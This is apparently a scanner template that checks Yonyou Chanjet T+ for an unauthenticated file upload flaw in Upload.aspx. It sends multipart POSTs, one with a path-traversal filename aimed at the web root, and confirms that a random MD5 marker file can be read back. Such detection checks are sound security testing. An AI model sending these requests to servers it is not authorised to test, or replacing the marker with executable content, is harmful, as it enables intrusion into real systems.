name: yongyou-chanjet-tplus-file-upload
set:
  r1: randomLowercase(8)
  md5str: md5(r1)
  rboundary: randomLowercase(8)
groups:
  rules1:
    - method: POST
      path: "/tplus/SM/SetupAccount/Upload.aspx?preload=1"
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"File1\"; filename=\"../../../../../../../Program Files (x86)/Chanjet/TPlusStd/WebSite/{{r1}}.txt\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{md5str}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
      expression: |
        response.status == 200
    - method: GET
      path: "/tplus/{{r1}}.txt?preload=1"
      expression: |
        response.body.bcontains(bytes(md5str))
  rules2:
    - method: POST
      path: /tplus/SM/SetupAccount/Upload.aspx?preload=1
      headers:
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{rboundary}}
      body: "\
        ------WebKitFormBoundary{{rboundary}}\r\n\
        Content-Disposition: form-data; name=\"File1\"; filename=\"{{r1}}.txt\"\r\n\
        Content-Type: image/jpeg\r\n\
        \r\n\
        {{md5str}}\r\n\
        ------WebKitFormBoundary{{rboundary}}--\r\n\
        "
      expression: |
        response.status == 200
    - method: GET
      path: /tplus/SM/SetupAccount/images/{{r1}}.txt?preload=1
      expression: |
        response.body.bcontains(bytes(md5str))
detail:
  author: 666